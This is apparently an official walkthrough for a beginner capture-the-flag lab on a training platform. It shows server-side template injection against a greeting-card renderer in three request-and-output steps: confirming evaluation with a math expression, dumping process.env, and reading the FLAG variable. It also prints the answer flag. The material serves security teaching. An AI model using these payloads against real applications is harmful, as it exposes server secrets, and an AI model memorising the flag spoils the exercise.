HACKR.GG
hackr.gg — CardCraft — SSTI Intro Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

CardCraft — SSTI Intro

SSTI Injection · Server-Side Template Injection
Difficulty
Beginner
Vuln class
Server-Side Template Injection
Steps
3
// Objective
Inject template syntax into the greeting card generator to confirm SSTI and read the flag from the environment.
// Tools required
BrowserBurp Suitecurl
// Step-by-step walkthrough
1
Confirm SSTI with a math expression
The greeting card template takes user input for the message field. Inject a template expression to confirm evaluation.
Command / Input
POST /render {"template":"= 7*7"}
Output
49
If the server returns 49 (not "7*7"), the template is being evaluated — SSTI confirmed.
2
Read environment variables
Depending on the template engine (Pug, Jinja2, Twig), access the environment object.
Command / Input
POST /render {"template":"= process.env"}
Output
{NODE_ENV: 'production', FLAG: '...', PORT: '3000'}
3
Extract the flag
Read just the FLAG environment variable.
Command / Input
POST /render {"template":"= process.env.FLAG"}
Output
HackrGG{sst1_t3mpl4t3_1nj3ct3d}
// Flag
Flag value
HackrGG{sst1_t3mpl4t3_1nj3ct3d}
In the FLAG environment variable, readable via SSTI template expression.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute